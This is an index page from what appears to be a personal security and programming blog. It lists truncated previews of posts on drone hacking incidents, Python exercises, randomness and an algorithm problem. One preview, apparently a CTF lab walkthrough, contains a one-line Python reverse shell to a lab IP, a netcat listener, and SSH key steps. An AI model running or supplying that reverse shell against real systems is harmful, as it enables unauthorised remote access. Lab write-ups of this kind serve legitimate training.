본문 바로가기

hacking sorcerer

(383)
military drone hacking Military Drone Hacking Incidents (2022–2025): Case Study and Cybersecurity CountermeasuresIntroduction(UK tech is protecting Ukrainian drones from Russian hackers in real-time - Euromaidan Press) Soldiers training with a quadcopter drone. Modern militaries rely heavily on unmanned aerial vehicles (UAVs), which have become targets for cyber attacks.Unmanned military drones have risen to prominenc..
log_dict.py from collections import defaultdictactivity_logs = {    'neuronet.edu': [(10, 5), (14, 5), (10, 6), (10, 5), (15, 6), (9, 4), (10, 5)],    'cybersys.tech': [(8, 3), (8, 3), (9, 3), (8, 4), (7, 2)],    'quantumhub.ac': [(11, 10), (11, 10), (15, 12), (11, 10), (16, 12)],    'aetherlab.io': [(13, 6), (14, 6), (13, 7), (14, 7), (14, 8), (13, 8)],    'xvoid.org': [(20, 20), (21, 21), (20, 21), (22, 2..
smart_home.py import uuidclass SmartDevice:    def __init__(self, device_id, name, location):        self.id = device_id or str(uuid.uuid4())        self.name = name        self.location = location        self._status = "Inactive"    def get_status(self):        return {            "id": self.id,            "name": self.name,            "location": self.location,            "status": self._status        }    ..
random = security high ? Let's say we build a system architect where every lock, key, and secret passage is generated by high quality randomness. The idea here is profound : when the system is designed by high randomness, it increases unpredictability. Why does it matter ? Because unpredictability prevents attackers to ensure there are no easily discernible patterns to exploit. This unpredictability forms the core idea ..
fake pomodoro DOCTYPE html>html lang="en">head>  meta charset="UTF-8">  meta name="viewport" content="width=device-width, initial-scale=1">  title>Mint Pomodorotitle>  style>    body {      background-color: #121212;      color: #98ff98;      font-family: 'Courier New', Courier, monospace;      display: flex;      justify-content: center;      align-items: center;      height: 100vh;      margin: 0;    }    ...
pingudad in a while ```/administrator.php# The Cod Caperid : pingudadpw : secretpasspython3 -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("10.10.92.172",36605)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); subprocess.call(["/bin/sh","-i"]);'nc -lvnp 36605ssh -i id_rsa pingu@10.10.72.214chmod 600 id_rsa(hidden password) : pinguapinguafter thi..
generate_password_verify.py # Problem: Secure Password Generator# # Create a Python program that generates a secure password based on user input.# The program should ask the user for the desired length and whether they want to include:# - Uppercase letters# - Lowercase letters# - Numbers# - Special characters## The program should then generate a random password that meets the user's criteria.## Constraints:# - The minimum ..
the simplest dp problem """The problem is the classic 0-1 Knapsack, where you're given items with specific weights and values, and you must select a subset that maximizes total value without exceeding a given capacity. Here, 'i' represents the number (or index) of items considered so far, and 'w' represents the current weight capacity being evaluated."""def knapsack(benefits, weights, capacity):    n = len(benefits)   ..